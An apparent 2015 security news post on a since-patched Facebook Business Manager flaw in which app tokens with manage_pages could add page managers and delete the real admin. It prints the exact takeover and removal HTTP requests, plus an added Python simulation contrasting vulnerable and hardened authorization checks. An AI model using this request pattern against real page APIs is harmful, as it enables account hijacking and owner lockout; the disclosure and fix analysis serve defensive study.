
Facebook Fan pages can be Hijacked by Hackers to take Admin Control



Facebook vulnerability allows hackers to take admin control of the business pages on Facebook

Security researcher Laxman Muthiya has found a serious vulnerability in the way Facebook's Business Manager handles third-party access. An attacker holding only the limited permissions normally granted to a third-party application could exploit it to make themselves an admin of a business page, and the victim would permanently lose admin access to that page.

Detailing his findings on his blog, Laxman has stated that if the vulnerability is exploited, the hacker can take over admin privileges of a Facebook page and remove the victim.

By default, the Facebook application interface does not allow third-party applications to add or modify page admin roles (page roles such as manager, editor, analyst and so on). Third-party applications may perform operations like posting statuses on your behalf or publishing photos, but not managing admin roles: if an application were allowed to add or remove admins, it could add an arbitrary user as admin to the page and remove the actual owner permanently.

Business pages on Facebook, however, work differently. Business Manager uses an endpoint called userpermissions to add or remove page roles for users who already belong to the business. Muthiya found that this endpoint did not enforce the restriction above: it could be used to take over the victim's business page and remove him or her from admin control.

Laxman found that this endpoint accepted requests made with an access token carrying only the manage_pages permission. The request takes the following form (X, B and AAAA... are placeholders for the user ID, the business ID and the access token):

POST /PGID/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=X&business=B&access_token=AAAA...

Page Takeover:

The takeover request differs from the Business Manager request above in two ways: the business parameter is absent, and the token is an ordinary third-party application access token that has been granted the manage_pages permission. The Content-Length values are reproduced from the write-up and do not match the placeholder bodies.

Request:
POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&access_token=<application_access_token>

Response:
true

Removing the Victim:

Request:
DELETE /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

user=<target_user_id>&access_token=<application_access_token>

Response:
true

In the first request <target_user_id> is the account being added as MANAGER; in the second it is the admin being removed. That's all: the target page is taken over and its original admin is locked out.
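To make the missing check concrete, here is an added example (not Facebook's code and not from the researcher's write-up) that models the /{page_id}/userpermissions endpoint in memory with two authorization policies: one that, like the vulnerable behaviour described above, accepts any token carrying manage_pages, and a hardened one that refuses third-party application tokens and requires a business admin to name the business that owns the page. The Token, Page and Business objects, the policy functions and the sample identifiers (PGID, B, victim, attacker, colleague) are assumptions made for the illustration; the two-request sequence replayed is the one shown above.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Set


@dataclass
class Token:
    kind: str                      # "app": third-party application token; "user": Business Manager session
    user_id: str                   # user on whose behalf the token acts
    scopes: Set[str] = field(default_factory=set)   # OAuth permissions, e.g. manage_pages

@dataclass
class Page:
    page_id: str
    roles: Dict[str, str]              # user_id -> page role (MANAGER, EDITOR, ...)
    business_id: Optional[str] = None  # Business Manager account that owns the page

@dataclass
class Business:
    business_id: str
    admins: Set[str]                   # users allowed to administer the business


# A policy decides whether `token` may change roles on `page`, given the
# business named in the request and the table of known businesses (assumed model).
Policy = Callable[[Token, Page, Optional[str], Dict[str, Business]], bool]


def vulnerable_policy(token, page, business, businesses) -> bool:
    """Models the bug: any token holding manage_pages may edit page roles.
    Neither the token type nor the business parameter is checked."""
    return "manage_pages" in token.scopes


def hardened_policy(token, page, business, businesses) -> bool:
    """Role changes are a first-party Business Manager operation: app tokens
    are refused whatever scopes they hold, the request must name the business
    that owns the page, and the acting user must be an admin of that business."""
    if token.kind != "user":
        return False
    if business is None or business != page.business_id:
        return False
    owner = businesses.get(business)
    return owner is not None and token.user_id in owner.admins


class UserPermissionsEndpoint:
    """In-memory stand-in for POST and DELETE /{page_id}/userpermissions."""

    def __init__(self, pages, businesses, policy: Policy):
        self.pages = {p.page_id: p for p in pages}
        self.businesses = {b.business_id: b for b in businesses}
        self.policy = policy

    def post(self, page_id, user, role, token, business=None) -> bool:
        page = self.pages[page_id]
        if not self.policy(token, page, business, self.businesses):
            return False                  # the real API would return an OAuth error
        page.roles[user] = role
        return True                       # the "true" response seen in the write-up

    def delete(self, page_id, user, token, business=None) -> bool:
        page = self.pages[page_id]
        if not self.policy(token, page, business, self.businesses):
            return False
        page.roles.pop(user, None)
        return True


def build_endpoint(policy: Policy) -> UserPermissionsEndpoint:
    """Constructed sample state: one business-owned page whose only manager is 'victim'."""
    page = Page(page_id="PGID", roles={"victim": "MANAGER"}, business_id="B")
    return UserPermissionsEndpoint([page], [Business("B", {"victim"})], policy)


def run_takeover(policy: Policy):
    """Replays the write-up's two requests with a third-party app token:
    POST role=MANAGER&user=attacker (no business parameter), then DELETE
    user=victim. Returns (added, removed, final page roles)."""
    endpoint = build_endpoint(policy)
    # Token the victim granted to the attacker's app: it acts on the victim's
    # behalf and holds manage_pages, but it is not a Business Manager session.
    app_token = Token(kind="app", user_id="victim", scopes={"manage_pages"})
    added = endpoint.post("PGID", user="attacker", role="MANAGER", token=app_token)
    removed = endpoint.delete("PGID", user="victim", token=app_token)
    return added, removed, dict(endpoint.pages["PGID"].roles)


def run_business_manager_add(policy: Policy) -> bool:
    """The legitimate request: a Business Manager session adds a colleague and
    names the business. This must keep working after the fix."""
    endpoint = build_endpoint(policy)
    session = Token(kind="user", user_id="victim", scopes={"manage_pages"})
    return endpoint.post("PGID", "colleague", "MANAGER", session, business="B")


if __name__ == "__main__":
    for name, policy in (("vulnerable", vulnerable_policy), ("hardened", hardened_policy)):
        print(name, "takeover:", run_takeover(policy), "legitimate add:", run_business_manager_add(policy))
```

Running the file prints the outcome of the replayed takeover under each policy: the vulnerable policy adds the attacker and removes the victim, while the hardened policy rejects both requests and still lets the legitimate Business Manager add succeed. The design point for anyone building such an API is that a permission scope like manage_pages only says what an app may do on a user's behalf; it is not evidence that the caller is the first-party surface a privileged operation was designed for, so the server must check the token type and the business relationship itself.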

Muthiya contacted the Facebook security team about the vulnerability. Facebook confirmed the vulnerability and awarded him a bug bounty of $2500.00. The vulnerability has been patched by Facebook.

Proof of concept video:

Hacking Facebook Pages
Another Serious Vulnerability in Facebook
Vulnerability: Hacking Facebook Pages
Status: Fixed
Reward: $2500 USD
Proof Of Concept: https://www.7xter.com/2015/08/hacking-facebook-pages.html

Posted by 7xter on Wednesday, August 26, 2015

vijay
